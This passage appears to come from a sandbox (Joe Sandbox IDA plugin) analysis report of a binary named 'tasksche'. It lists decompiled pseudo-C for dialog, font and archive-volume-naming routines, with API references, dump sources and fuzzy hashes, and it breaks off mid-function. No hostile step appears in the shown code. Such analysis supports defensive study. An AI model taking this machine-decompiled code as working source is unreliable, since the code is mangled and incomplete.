                                                                                              				if(_t14 == 0) {
                                                                                              					_t15 =  *0x43981c;
                                                                                              					_t41 = SendMessageW;
                                                                                              					__eflags = _t15;
                                                                                              					if(_t15 != 0) {
                                                                                              						SendMessageW(_t34, 0x80, 1, _t15);
                                                                                              					}
                                                                                              					_t16 =  *0x439818;
                                                                                              					__eflags = _t16;
                                                                                              					if(__eflags != 0) {
                                                                                              						SendDlgItemMessageW(_t34, 0x66, 0x172, 0, _t16);
                                                                                              					}
                                                                                              					E0040DBC1(_t38, __eflags, _t49, _t34);
                                                                                              					_t18 = GetDlgItem(_t34, 0x65);
                                                                                              					_a8 = _t18;
                                                                                              					SendMessageW(_t18, 0x435, 0, 0x10000);
                                                                                              					SendMessageW(_a8, 0x443, 0, GetSysColor(0xf));
                                                                                              					E0040E857(_t41, _t34,  *0x44184c, 3);
                                                                                              					_pop(_t42);
                                                                                              					__eflags =  *0x441854;
                                                                                              					if(__eflags == 0) {
                                                                                              						L13:
                                                                                              						_push(1);
                                                                                              						L14:
                                                                                              						EndDialog(_t34, ??);
                                                                                              					} else {
                                                                                              						SetForegroundWindow(_t34);
                                                                                              						_t36 =  *0x438810; // 0x19feac
                                                                                              						E00419A9D(_t36, __eflags,  *0x4335a4, _a8,  *0x441854, 0, 0);
                                                                                              						_push( *0x441854);
                                                                                              						E0041A506(_t34, 0, _t42, __eflags);
                                                                                              					}
                                                                                              					goto L15;
                                                                                              				}
                                                                                              				if(_t14 != 1) {
                                                                                              					L5:
                                                                                              					return 0;
                                                                                              				}
                                                                                              				_t32 = (_a12 & 0x0000ffff) - 1;
                                                                                              				if(_t32 == 0) {
                                                                                              					goto L13;
                                                                                              				}
                                                                                              				if(_t32 == 1) {
                                                                                              					_push(0);
                                                                                              					goto L14;
                                                                                              				}
                                                                                              				goto L5;
                                                                                              			}
















                                                                                              0x0040f47b
                                                                                              0x0040f47b
                                                                                              0x0040f47f
                                                                                              0x0040f49d
                                                                                              0x0040f584
                                                                                              0x0040f586
                                                                                              0x00000000
                                                                                              0x0040f586
                                                                                              0x0040f4a6
                                                                                              0x0040f4ab
                                                                                              0x0040f4cb
                                                                                              0x0040f4d1
                                                                                              0x0040f4d7
                                                                                              0x0040f4d9
                                                                                              0x0040f4e4
                                                                                              0x0040f4e4
                                                                                              0x0040f4e6
                                                                                              0x0040f4eb
                                                                                              0x0040f4ed
                                                                                              0x0040f4f9
                                                                                              0x0040f4f9
                                                                                              0x0040f500
                                                                                              0x0040f508
                                                                                              0x0040f51a
                                                                                              0x0040f51d
                                                                                              0x0040f531
                                                                                              0x0040f53c
                                                                                              0x0040f541
                                                                                              0x0040f542
                                                                                              0x0040f548
                                                                                              0x0040f57b
                                                                                              0x0040f57b
                                                                                              0x0040f57d
                                                                                              0x0040f57e
                                                                                              0x0040f54a
                                                                                              0x0040f54b
                                                                                              0x0040f551
                                                                                              0x0040f568
                                                                                              0x0040f56d
                                                                                              0x0040f573
                                                                                              0x0040f578
                                                                                              0x00000000
                                                                                              0x0040f548
                                                                                              0x0040f4ae
                                                                                              0x0040f4be
                                                                                              0x00000000
                                                                                              0x0040f4be
                                                                                              0x0040f4b4
                                                                                              0x0040f4b5
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040f4bc
                                                                                              0x0040f4c5
                                                                                              0x00000000
                                                                                              0x0040f4c5
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,00000080,00000001,?), ref: 0040F4E4
                                                                                              • SendDlgItemMessageW.USER32 ref: 0040F4F9
                                                                                              • GetDlgItem.USER32 ref: 0040F508
                                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0040F51D
                                                                                              • GetSysColor.USER32(0000000F), ref: 0040F521
                                                                                              • SendMessageW.USER32(?,00000443,00000000,00000000), ref: 0040F531
                                                                                              • SetForegroundWindow.USER32(?,00000003), ref: 0040F54B
                                                                                              • EndDialog.USER32(?,00000001), ref: 0040F57E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Item$ColorDialogForegroundWindow
                                                                                              • String ID: LICENSEDLG
                                                                                              • API String ID: 3794146707-2177901306
                                                                                              • Opcode ID: d9c859b37e3cb600bcc19d133c3a45f80262450e0631c0b47ec7fe9b94556e21
                                                                                              • Instruction ID: 7fefae372e04e04a7da23b2667bfd905224a5402d39c62195e2e2b0091848963
                                                                                              • Opcode Fuzzy Hash: d9c859b37e3cb600bcc19d133c3a45f80262450e0631c0b47ec7fe9b94556e21
                                                                                              • Instruction Fuzzy Hash: E521F9312002047BDB31AF61EC45E5B3B6DEB89B10F408436FE15B51E2D6798955CB2C
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E0040DBC1(void* __edx, void* __eflags, void* __fp0, signed int _a4) {
                                                                                              				struct HWND__* _v8;
                                                                                              				intOrPtr _v24;
                                                                                              				intOrPtr _v28;
                                                                                              				void _v32;
                                                                                              				short _v4128;
                                                                                              				void* _t16;
                                                                                              				struct HWND__* _t17;
                                                                                              				void* _t27;
                                                                                              				void* _t35;
                                                                                              				struct HWND__* _t37;
                                                                                              				void* _t41;
                                                                                              				void* _t42;
                                                                                              				void* _t52;
                                                                                              
                                                                                              				_t52 = __fp0;
                                                                                              				_t42 = __eflags;
                                                                                              				_t35 = __edx;
                                                                                              				E0041AAF0(0x101c);
                                                                                              				_t16 = E00419E56(_t42);
                                                                                              				if(_t16 == 0) {
                                                                                              					return _t16;
                                                                                              				}
                                                                                              				_t17 = GetWindow(_a4, 5);
                                                                                              				_a4 = _a4 & 0x00000000;
                                                                                              				_t37 = _t17;
                                                                                              				_v8 = _t37;
                                                                                              				if(_t37 == 0) {
                                                                                              					L12:
                                                                                              					return _t17;
                                                                                              				} else {
                                                                                              					while(_a4 < 0x200) {
                                                                                              						GetClassNameW(_t37,  &_v4128, 0x800);
                                                                                              						if(E00411E60( &_v4128, L"STATIC") == 0 && (GetWindowLongW(_t37, 0xfffffff0) & 0x0000001f) == 0xe) {
                                                                                              							_t41 = SendMessageW(_t37, 0x173, 0, 0);
                                                                                              							if(_t41 != 0) {
                                                                                              								GetObjectW(_t41, 0x18,  &_v32);
                                                                                              								_t27 = E00419E13(_v24);
                                                                                              								SendMessageW(_t37, 0x172, 0, E00419EA0(_t35, _t52, _t41, E00419DD0(_v28), _t27));
                                                                                              								if(_t41 !=  *0x439818) {
                                                                                              									DeleteObject(_t41);
                                                                                              								}
                                                                                              							}
                                                                                              						}
                                                                                              						_t17 = GetWindow(_t37, 2);
                                                                                              						_t37 = _t17;
                                                                                              						if(_t37 != _v8) {
                                                                                              							_a4 =  &(_a4->i);
                                                                                              							if(_t37 != 0) {
                                                                                              								continue;
                                                                                              							}
                                                                                              						}
                                                                                              						break;
                                                                                              					}
                                                                                              					goto L12;
                                                                                              				}
                                                                                              			}
















                                                                                              0x0040dbc1
                                                                                              0x0040dbc1
                                                                                              0x0040dbc1
                                                                                              0x0040dbc9
                                                                                              0x0040dbce
                                                                                              0x0040dbd5
                                                                                              0x0040dcb5
                                                                                              0x0040dcb5
                                                                                              0x0040dbe1
                                                                                              0x0040dbe7
                                                                                              0x0040dbeb
                                                                                              0x0040dbed
                                                                                              0x0040dbf2
                                                                                              0x0040dcb3
                                                                                              0x00000000
                                                                                              0x0040dbf8
                                                                                              0x0040dc00
                                                                                              0x0040dc1a
                                                                                              0x0040dc33
                                                                                              0x0040dc51
                                                                                              0x0040dc55
                                                                                              0x0040dc5e
                                                                                              0x0040dc67
                                                                                              0x0040dc85
                                                                                              0x0040dc8d
                                                                                              0x0040dc90
                                                                                              0x0040dc90
                                                                                              0x0040dc8d
                                                                                              0x0040dc55
                                                                                              0x0040dc99
                                                                                              0x0040dc9f
                                                                                              0x0040dca4
                                                                                              0x0040dca6
                                                                                              0x0040dcab
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040dcab
                                                                                              0x00000000
                                                                                              0x0040dca4
                                                                                              0x00000000
                                                                                              0x0040dcb2

                                                                                              APIs
                                                                                              • GetWindow.USER32(?,00000005), ref: 0040DBE1
                                                                                              • GetClassNameW.USER32 ref: 0040DC1A
                                                                                                • Part of subcall function 00411E60: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,00000000,000000FF,00409CA8,?,00000000,?,00409DC2,00000000,-00000002,?,00000000,?), ref: 00411E76
                                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 0040DC38
                                                                                              • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0040DC4F
                                                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 0040DC5E
                                                                                                • Part of subcall function 00419E13: GetDC.USER32(00000000), ref: 00419E1F
                                                                                                • Part of subcall function 00419E13: GetDeviceCaps.GDI32(00000000,0000005A), ref: 00419E2E
                                                                                                • Part of subcall function 00419E13: ReleaseDC.USER32 ref: 00419E3C
                                                                                                • Part of subcall function 00419DD0: GetDC.USER32(00000000), ref: 00419DDC
                                                                                                • Part of subcall function 00419DD0: GetDeviceCaps.GDI32(00000000,00000058), ref: 00419DEB
                                                                                                • Part of subcall function 00419DD0: ReleaseDC.USER32 ref: 00419DF9
                                                                                              • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040DC85
                                                                                              • DeleteObject.GDI32(00000000), ref: 0040DC90
                                                                                              • GetWindow.USER32(00000000,00000002), ref: 0040DC99
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$CapsDeviceMessageObjectReleaseSend$ClassCompareDeleteLongNameString
                                                                                              • String ID: STATIC
                                                                                              • API String ID: 1444658586-1882779555
                                                                                              • Opcode ID: 9567939a25e22092ccbfb99d506bbc14daa15c8c25c728e04901b5a25124ff52
                                                                                              • Instruction ID: 65505d2462e9bd66d8f24c48bff8a2f322d46b7930d969d63ebb67ecbc3f0dac
                                                                                              • Opcode Fuzzy Hash: 9567939a25e22092ccbfb99d506bbc14daa15c8c25c728e04901b5a25124ff52
                                                                                              • Instruction Fuzzy Hash: B321F132A40204BBEB21AB90CC46FEF77B8AF41B50F404026FD04B61C1CBB89D86D66D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 95%
                                                                                              			E0040BF1D(intOrPtr* __ecx, intOrPtr _a4, short* _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                              				char _v24;
                                                                                              				char _v25;
                                                                                              				char _v4120;
                                                                                              				char _v8216;
                                                                                              				short* _t25;
                                                                                              				intOrPtr _t28;
                                                                                              				void* _t40;
                                                                                              				void* _t41;
                                                                                              				signed int _t42;
                                                                                              				void* _t52;
                                                                                              				void* _t55;
                                                                                              				intOrPtr* _t57;
                                                                                              				short* _t58;
                                                                                              				char* _t63;
                                                                                              				signed int _t68;
                                                                                              				void* _t72;
                                                                                              				intOrPtr _t73;
                                                                                              				signed int _t75;
                                                                                              
                                                                                              				E0041AAF0(0x2014);
                                                                                              				_t57 = __ecx;
                                                                                              				if( *__ecx == 0) {
                                                                                              					L21:
                                                                                              					_t25 = _a8;
                                                                                              					if(_a4 == _t25) {
                                                                                              						L23:
                                                                                              						return _t25;
                                                                                              					}
                                                                                              					return E0041A7F7(_t25, _a4);
                                                                                              				}
                                                                                              				_t28 = _a16;
                                                                                              				_t63 = 0x42a73a;
                                                                                              				if(_t28 == 0) {
                                                                                              					_t63 = "s";
                                                                                              				} else {
                                                                                              					_t55 = _t28 - 1;
                                                                                              					if(_t55 == 0) {
                                                                                              						_t63 = "$";
                                                                                              					} else {
                                                                                              						if(_t55 == 1) {
                                                                                              							_t63 = "@";
                                                                                              						}
                                                                                              					}
                                                                                              				}
                                                                                              				_t72 = E00405610(0xffffffff, _t63, 1);
                                                                                              				if(_a20 != 0) {
                                                                                              					E00411AFD(_t63, _a20,  &_v8216, 0x1000);
                                                                                              					_t52 = E0041AA60( &_v8216);
                                                                                              					_pop(_t63);
                                                                                              					_t72 = E00405610(_t72,  &_v8216, _t52);
                                                                                              				}
                                                                                              				E00411AFD(_t63, _a4,  &_v4120, 0x1000);
                                                                                              				_v25 = 0;
                                                                                              				E0040BC16( &_v24, 0xa, L"%08x",  !(E00405610(_t72,  &_v4120, E0041AA60( &_v4120))));
                                                                                              				_t40 = E0040BB89(_t57,  &_v24);
                                                                                              				if(_t40 == 0) {
                                                                                              					goto L21;
                                                                                              				} else {
                                                                                              					_t14 = _t40 + 0x12; // 0x12
                                                                                              					_t58 = _t14;
                                                                                              					if( *_t58 == 0x22) {
                                                                                              						_t58 = _t58 + 2;
                                                                                              					}
                                                                                              					_t41 = E0041CA29(_t58, 0xc);
                                                                                              					if(_t41 == 0) {
                                                                                              						_t75 = 0xff;
                                                                                              					} else {
                                                                                              						_t75 = _t41 - _t58 >> 1;
                                                                                              					}
                                                                                              					_t42 = _a12;
                                                                                              					_t16 = _t42 - 1; // 0x4118d7
                                                                                              					_t68 = _t16;
                                                                                              					if(_t75 > _t68) {
                                                                                              						asm("sbb eax, eax");
                                                                                              						_t75 =  ~_t42 & _t68;
                                                                                              					}
                                                                                              					_t73 = _a8;
                                                                                              					if(_t75 > 0) {
                                                                                              						E0041C853(_t73, _t58, _t75);
                                                                                              					}
                                                                                              					 *((short*)(_t73 + _t75 * 2)) = 0;
                                                                                              					_t25 = E0041CA4F(_t73, 0x22);
                                                                                              					if(_t25 == 0) {
                                                                                              						goto L23;
                                                                                              					} else {
                                                                                              						 *_t25 = 0;
                                                                                              						return _t25;
                                                                                              					}
                                                                                              				}
                                                                                              			}





















                                                                                              0x0040bf25
                                                                                              0x0040bf2b
                                                                                              0x0040bf32
                                                                                              0x0040c05b
                                                                                              0x0040c05b
                                                                                              0x0040c061
                                                                                              0x0040c072
                                                                                              0x0040c072
                                                                                              0x0040c072
                                                                                              0x00000000
                                                                                              0x0040c06d
                                                                                              0x0040bf3b
                                                                                              0x0040bf3e
                                                                                              0x0040bf43
                                                                                              0x0040bf59
                                                                                              0x0040bf45
                                                                                              0x0040bf45
                                                                                              0x0040bf46
                                                                                              0x0040bf52
                                                                                              0x0040bf48
                                                                                              0x0040bf49
                                                                                              0x0040bf4b
                                                                                              0x0040bf4b
                                                                                              0x0040bf49
                                                                                              0x0040bf46
                                                                                              0x0040bf6c
                                                                                              0x0040bf73
                                                                                              0x0040bf80
                                                                                              0x0040bf8c
                                                                                              0x0040bf91
                                                                                              0x0040bfa0
                                                                                              0x0040bfa0
                                                                                              0x0040bfad
                                                                                              0x0040bfb9
                                                                                              0x0040bfdf
                                                                                              0x0040bfed
                                                                                              0x0040bff4
                                                                                              0x00000000
                                                                                              0x0040bff6
                                                                                              0x0040bff6
                                                                                              0x0040bff6
                                                                                              0x0040bffd
                                                                                              0x0040c000
                                                                                              0x0040c000
                                                                                              0x0040c004
                                                                                              0x0040c00d
                                                                                              0x0040c017
                                                                                              0x0040c00f
                                                                                              0x0040c013
                                                                                              0x0040c013
                                                                                              0x0040c01c
                                                                                              0x0040c01f
                                                                                              0x0040c01f
                                                                                              0x0040c024
                                                                                              0x0040c028
                                                                                              0x0040c02c
                                                                                              0x0040c02c
                                                                                              0x0040c02e
                                                                                              0x0040c033
                                                                                              0x0040c038
                                                                                              0x0040c03d
                                                                                              0x0040c045
                                                                                              0x0040c049
                                                                                              0x0040c052
                                                                                              0x00000000
                                                                                              0x0040c054
                                                                                              0x0040c056
                                                                                              0x00000000
                                                                                              0x0040c056
                                                                                              0x0040c052

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: _strlen$_swprintf_wcschr_wcscpy_wcsncpy_wcsrchr
                                                                                              • String ID: %08x
                                                                                              • API String ID: 3224783807-3682738293
                                                                                              • Opcode ID: 2200e9e523ffbcd5ccc4f85804e7305beb7f218704d283e0c38cbcae486b8257
                                                                                              • Instruction ID: 07d0537aec3a1dd66ebb0c57739ff8632de72c66deae5d09d2d4ff76284a4df6
                                                                                              • Opcode Fuzzy Hash: 2200e9e523ffbcd5ccc4f85804e7305beb7f218704d283e0c38cbcae486b8257
                                                                                              • Instruction Fuzzy Hash: 4841E832500219AADB24AB64CC85AFF32ACDF40754F54413BB915E71C1DB7DDD80C6AE
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E0040A8A1(intOrPtr _a4, intOrPtr _a8, char _a12) {
                                                                                              				short _t13;
                                                                                              				short _t16;
                                                                                              				short _t19;
                                                                                              				signed short* _t20;
                                                                                              				signed int _t22;
                                                                                              				signed short _t23;
                                                                                              				intOrPtr* _t25;
                                                                                              				signed short _t27;
                                                                                              				short _t29;
                                                                                              				void* _t31;
                                                                                              				intOrPtr _t34;
                                                                                              				signed short* _t40;
                                                                                              				signed short _t41;
                                                                                              				signed short _t47;
                                                                                              				short* _t48;
                                                                                              				void* _t50;
                                                                                              				signed short* _t51;
                                                                                              				signed short* _t52;
                                                                                              
                                                                                              				_t34 = _a4;
                                                                                              				_t50 = E0040A76A(_t34);
                                                                                              				_t54 = _t50;
                                                                                              				if(_t50 != 0) {
                                                                                              					_t3 = _t50 + 2; // 0x2
                                                                                              					_t48 = _t3;
                                                                                              					__eflags =  *_t48;
                                                                                              					if( *_t48 != 0) {
                                                                                              						L4:
                                                                                              						_t13 = E00411E60(_t48, L"exe");
                                                                                              						__eflags = _t13;
                                                                                              						if(_t13 == 0) {
                                                                                              							L6:
                                                                                              							E0041A7F7(_t48, L"rar");
                                                                                              							L7:
                                                                                              							_t55 = _a12;
                                                                                              							if(_a12 != 0) {
                                                                                              								_t10 = _t50 + 4; // 0x4
                                                                                              								_t49 = _t10;
                                                                                              								_t16 = E00410B6D( *_t10 & 0x0000ffff);
                                                                                              								__eflags = _t16;
                                                                                              								if(_t16 == 0) {
                                                                                              									L25:
                                                                                              									return E0041A7F7(_t49, L"00");
                                                                                              								}
                                                                                              								_t51 = _t50 + 6;
                                                                                              								_t19 = E00410B6D( *_t51 & 0x0000ffff);
                                                                                              								__eflags = _t19;
                                                                                              								if(_t19 == 0) {
                                                                                              									goto L25;
                                                                                              								}
                                                                                              								_t20 = _t51;
                                                                                              								while(1) {
                                                                                              									 *_t20 =  *_t20 + 1;
                                                                                              									__eflags = ( *_t20 & 0x0000ffff) - 0x3a;
                                                                                              									if(( *_t20 & 0x0000ffff) != 0x3a) {
                                                                                              										break;
                                                                                              									}
                                                                                              									_t11 = _t20 - 2; // -7
                                                                                              									_t40 = _t11;
                                                                                              									__eflags =  *_t40 - 0x2e;
                                                                                              									if( *_t40 == 0x2e) {
                                                                                              										_t41 = 0x41;
                                                                                              										 *_t20 = _t41;
                                                                                              										return _t20;
                                                                                              									}
                                                                                              									_t47 = 0x30;
                                                                                              									 *_t20 = _t47;
                                                                                              									_t20 = _t40;
                                                                                              								}
                                                                                              								return _t20;
                                                                                              							}
                                                                                              							_t52 = E0040A81E(_t55, _t34);
                                                                                              							while(1) {
                                                                                              								 *_t52 =  *_t52 + 1;
                                                                                              								_t22 =  *_t52 & 0x0000ffff;
                                                                                              								if(_t22 != 0x3a) {
                                                                                              									break;
                                                                                              								}
                                                                                              								_t23 = 0x30;
                                                                                              								 *_t52 = _t23;
                                                                                              								_t52 = _t52;
                                                                                              								__eflags = _t52 - _t34;
                                                                                              								if(_t52 < _t34) {
                                                                                              									L13:
                                                                                              									_t25 = _t34 + E0041A7AF(_t34) * 2;
                                                                                              									while(1) {
                                                                                              										__eflags = _t25 - _t52;
                                                                                              										if(_t25 == _t52) {
                                                                                              											break;
                                                                                              										}
                                                                                              										 *((short*)(_t25 + 2)) =  *_t25;
                                                                                              										_t25 = _t25;
                                                                                              										__eflags = _t25;
                                                                                              									}
                                                                                              									_t27 = 0x31;
                                                                                              									_t52[1] = _t27;
                                                                                              									return _t27;
                                                                                              								}
                                                                                              								_t29 = E00410B6D( *_t52 & 0x0000ffff);
                                                                                              								__eflags = _t29;
                                                                                              								if(_t29 == 0) {
                                                                                              									goto L13;
                                                                                              								}
                                                                                              							}
                                                                                              							return _t22;
                                                                                              						}
                                                                                              						__eflags = E00411E60(_t48, L"sfx");
                                                                                              						if(__eflags != 0) {
                                                                                              							goto L7;
                                                                                              						}
                                                                                              						goto L6;
                                                                                              					}
                                                                                              					_t31 = E0041A7AF(_t34);
                                                                                              					__eflags = _t31 - _a8 + 0xfffffffd;
                                                                                              					if(_t31 < _a8 + 0xfffffffd) {
                                                                                              						goto L6;
                                                                                              					}
                                                                                              					goto L4;
                                                                                              				}
                                                                                              				E00410BC9(_t54, _t34, L".rar", _a8);
                                                                                              				_t50 = E0040A76A(_t34);
                                                                                              				goto L7;
                                                                                              			}





















                                                                                              0x0040a8a2
                                                                                              0x0040a8ae
                                                                                              0x0040a8b0
                                                                                              0x0040a8b2
                                                                                              0x0040a8cd
                                                                                              0x0040a8cd
                                                                                              0x0040a8d0
                                                                                              0x0040a8d4
                                                                                              0x0040a8e8
                                                                                              0x0040a8ee
                                                                                              0x0040a8f3
                                                                                              0x0040a8f5
                                                                                              0x0040a906
                                                                                              0x0040a90c
                                                                                              0x0040a913
                                                                                              0x0040a913
                                                                                              0x0040a918
                                                                                              0x0040a96d
                                                                                              0x0040a96d
                                                                                              0x0040a974
                                                                                              0x0040a979
                                                                                              0x0040a97b
                                                                                              0x0040a9b8
                                                                                              0x00000000
                                                                                              0x0040a9c4
                                                                                              0x0040a97d
                                                                                              0x0040a984
                                                                                              0x0040a989
                                                                                              0x0040a98b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040a98d
                                                                                              0x0040a9a2
                                                                                              0x0040a9a2
                                                                                              0x0040a9a8
                                                                                              0x0040a9ac
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040a991
                                                                                              0x0040a991
                                                                                              0x0040a994
                                                                                              0x0040a998
                                                                                              0x0040a9b2
                                                                                              0x0040a9b3
                                                                                              0x00000000
                                                                                              0x0040a9b3
                                                                                              0x0040a99c
                                                                                              0x0040a99d
                                                                                              0x0040a9a0
                                                                                              0x0040a9a0
                                                                                              0x00000000
                                                                                              0x0040a9a2
                                                                                              0x0040a920
                                                                                              0x0040a93d
                                                                                              0x0040a93d
                                                                                              0x0040a940
                                                                                              0x0040a947
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040a926
                                                                                              0x0040a927
                                                                                              0x0040a92b
                                                                                              0x0040a92c
                                                                                              0x0040a92e
                                                                                              0x0040a94b
                                                                                              0x0040a952
                                                                                              0x0040a960
                                                                                              0x0040a960
                                                                                              0x0040a962
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040a95a
                                                                                              0x0040a95f
                                                                                              0x0040a95f
                                                                                              0x0040a95f
                                                                                              0x0040a966
                                                                                              0x0040a967
                                                                                              0x00000000
                                                                                              0x0040a967
                                                                                              0x0040a934
                                                                                              0x0040a939
                                                                                              0x0040a93b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040a93b
                                                                                              0x00000000
                                                                                              0x0040a93d
                                                                                              0x0040a902
                                                                                              0x0040a904
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040a904
                                                                                              0x0040a8d7
                                                                                              0x0040a8e4
                                                                                              0x0040a8e6
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040a8e6
                                                                                              0x0040a8be
                                                                                              0x0040a8c9
                                                                                              0x00000000

                                                                                              APIs
                                                                                                • Part of subcall function 0040A76A: _wcsrchr.LIBCMT ref: 0040A77E
                                                                                              • _wcslen.LIBCMT ref: 0040A8D7
                                                                                              • _wcscpy.LIBCMT ref: 0040A90C
                                                                                                • Part of subcall function 00410BC9: _wcslen.LIBCMT ref: 00410BCF
                                                                                                • Part of subcall function 00410BC9: _wcsncat.LIBCMT ref: 00410BE8
                                                                                              • _wcslen.LIBCMT ref: 0040A94C
                                                                                              • _wcscpy.LIBCMT ref: 0040A9BE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$_wcscpy$_wcsncat_wcsrchr
                                                                                              • String ID: .rar$exe$rar$sfx
                                                                                              • API String ID: 1023950463-630704357
                                                                                              • Opcode ID: 9e98728e43a4f5731da7381b6b017391db5884caad39c64eb22fb19538172cba
                                                                                              • Instruction ID: 29a0ca65efafee0ddffcc544de8f71498ac5d95f7ded716494b7ad5447c572c4
                                                                                              • Opcode Fuzzy Hash: 9e98728e43a4f5731da7381b6b017391db5884caad39c64eb22fb19538172cba
                                                                                              • Instruction Fuzzy Hash: 233106B170431056C3206B259C46A7B63A8DF05794B264C3BF882BB1E1E77C98E2925F
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 78%
                                                                                              			E0041963B(void* __ecx, signed int _a4, intOrPtr _a8) {
                                                                                              				int _v8;
                                                                                              				void* _v12;
                                                                                              				long _v16;
                                                                                              				struct tagMSG _v44;
                                                                                              				void* __ebx;
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				void* __ebp;
                                                                                              				intOrPtr* _t43;
                                                                                              				intOrPtr* _t47;
                                                                                              				signed int _t48;
                                                                                              				signed int _t51;
                                                                                              				signed int _t57;
                                                                                              				signed int _t58;
                                                                                              				signed int _t59;
                                                                                              				intOrPtr* _t61;
                                                                                              				signed int _t62;
                                                                                              				intOrPtr* _t63;
                                                                                              				intOrPtr* _t65;
                                                                                              				void* _t75;
                                                                                              				WCHAR* _t76;
                                                                                              				void* _t90;
                                                                                              
                                                                                              				_t75 = GetTickCount;
                                                                                              				_t90 = __ecx;
                                                                                              				_v8 = 0;
                                                                                              				_v12 = 0;
                                                                                              				_v16 = GetTickCount();
                                                                                              				while(1) {
                                                                                              					_t43 = _a4;
                                                                                              					_push( &_v8);
                                                                                              					_push(_t43);
